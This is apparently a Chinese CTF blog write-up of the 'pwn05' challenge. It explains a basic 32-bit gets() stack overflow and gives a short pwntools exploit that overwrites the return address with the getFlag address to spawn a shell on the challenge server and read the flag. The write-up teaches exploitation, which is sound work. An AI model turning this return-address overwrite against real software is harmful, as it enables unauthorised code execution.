pwn05(应对简单栈溢出的常规套路)

简介: pwn05(应对简单栈溢出的常规套路)

一、常规检查(nc、file、checksec)

启动容器我们拿到连接和端口

尝试nc,发现没什么反应(应该是主函数里并没有输出语句)

常规套路性操作,下载附件拖进kali检查(尽管对于这种基础题来说没必要但我们最好还是按照流程走一遍,以后做复杂一些的题这些基本流程还是很重要的,养成好习惯)


使用file和checksec命令进行检查:


注意:那个checksec的使用,--file=文件名,中间不能有空格,否则执行会报错,并且需要先切换到该文件所在目录,否则你需要跟上完整的文件路径才行,不然找不到。

从结果可以看出,并没有开什么保护机制,并且是一个32位程序。

关于上面参数的详细解释可以参考我上一篇博客 http://t.csdn.cn/oT8gb

二、IDA反编译,只找两个东西即可

1、寻找造成栈溢出的函数的地址到ebp的距离

定位main函数,F5反编译

只有一个welcome()函数,双击跟进,找到这个距离是14(ebp减多少就是多少)

这里这个s数组只能存入16个字节,而gets()函数想读多少读多少,就会造成栈溢出

2、 寻找我们所要利用的函数的地址(即我们希望程序最后返回到哪里)

不难发现这里有一个很明显的getFlag函数

就算函数名没有这么明显,也没关系,还有一种方法:

我们使用快捷键shift+F12,去找 /bin/sh

找到之后双击跟进

继续双击getFlag跟进,定位之后F5反编译

得到getFlag函数的伪代码

可以看到,只要让程序最后返回的是getflag函数所在的地址,我们便可通过调用system函数实现命令执行,以此来获取flag。

双击getFlag函数,定位到该函数所在地址:08048486(注意后面写exp脚本时前面要加上0x)

三、编写并运行exp脚本

这种简单的栈溢出脚本都有固定模板

from pwn import *
#p = process("./stack")
p = remote("pwn.challenge.ctf.show",28107) //题目给你的地址和端口
#p.recv() //接收输出,这里没有所以注释掉
payload = b"a"*(0x14+4) + p32(0x08048486) //根据第二步我们找到的东西来填即可
p.send(payload)  //将构造好的payload发送到远程连接的目标端点
p.interactive()  //启动交互式会话,允许用户在本地终端与远程连接进行交互

由于主函数里面没有输出字符串,我们将接受即p.recv()注释掉即可。

如果主函数本身会输出东西,比如下图:

我们就需要对它进行一个接收处理,使用 p.recv()或者p.recvuntil('32bits\n'),使用recvuntil时里面内容改成最后接收的字符串内容。


注意:在距离14前也需要加上0x,至于后面的+4,你只需要记住32位程序+4,64位+8就行,加的其实是ebp(栈底)自己的长度,因为我们除了覆盖前面的距离还需要覆盖掉ebp,让覆盖之后的返回地址刚好等于我们所要利用的函数所在地址,而p32函数里面就是放我们想要跳转的地址,p32只是对这个地址进行转化,给它转换成4个字节序列存储。


我们使用python3来运行exp脚本:

发现flag,直接cat

ctfshow{121e2036-2c07-45bb-8f44-1aab5a35b06d}

目录
相关文章
|
2天前
|
C语言
【数据结构】栈和队列(c语言实现)(附源码)
本文介绍了栈和队列两种数据结构。栈是一种只能在一端进行插入和删除操作的线性表,遵循“先进后出”原则;队列则在一端插入、另一端删除,遵循“先进先出”原则。文章详细讲解了栈和队列的结构定义、方法声明及实现,并提供了完整的代码示例。栈和队列在实际应用中非常广泛,如二叉树的层序遍历和快速排序的非递归实现等。
38 9
|
1月前
|
存储 算法 搜索推荐
探索常见数据结构:数组、链表、栈、队列、树和图
探索常见数据结构:数组、链表、栈、队列、树和图
85 64
|
1天前
|
存储
系统调用处理程序在内核栈中保存了哪些上下文信息?
【10月更文挑战第29天】系统调用处理程序在内核栈中保存的这些上下文信息对于保证系统调用的正确执行和用户程序的正常恢复至关重要。通过准确地保存和恢复这些信息,操作系统能够实现用户模式和内核模式之间的无缝切换,为用户程序提供稳定、可靠的系统服务。
20 4
|
24天前
|
算法 程序员 索引
数据结构与算法学习七:栈、数组模拟栈、单链表模拟栈、栈应用实例 实现 综合计算器
栈的基本概念、应用场景以及如何使用数组和单链表模拟栈,并展示了如何利用栈和中缀表达式实现一个综合计算器。
25 1
数据结构与算法学习七:栈、数组模拟栈、单链表模拟栈、栈应用实例 实现 综合计算器
|
5天前
|
算法 安全 NoSQL
2024重生之回溯数据结构与算法系列学习之栈和队列精题汇总(10)【无论是王道考研人还是IKUN都能包会的;不然别给我家鸽鸽丢脸好嘛?】
数据结构王道第3章之IKUN和I原达人之数据结构与算法系列学习栈与队列精题详解、数据结构、C++、排序算法、java、动态规划你个小黑子;这都学不会;能不能不要给我家鸽鸽丢脸啊~除了会黑我家鸽鸽还会干嘛?!!!
|
24天前
初步认识栈和队列
初步认识栈和队列
52 10
|
18天前
数据结构(栈与列队)
数据结构(栈与列队)
15 1
|
24天前
|
算法
数据结构与算法二:栈、前缀、中缀、后缀表达式、中缀表达式转换为后缀表达式
这篇文章讲解了栈的基本概念及其应用,并详细介绍了中缀表达式转换为后缀表达式的算法和实现步骤。
39 3
|
23天前
|
存储 JavaScript 前端开发
为什么基础数据类型存放在栈中,而引用数据类型存放在堆中?
为什么基础数据类型存放在栈中,而引用数据类型存放在堆中?
61 1
|
26天前
|
存储 安全 Java
【用Java学习数据结构系列】探索栈和队列的无尽秘密
【用Java学习数据结构系列】探索栈和队列的无尽秘密
28 2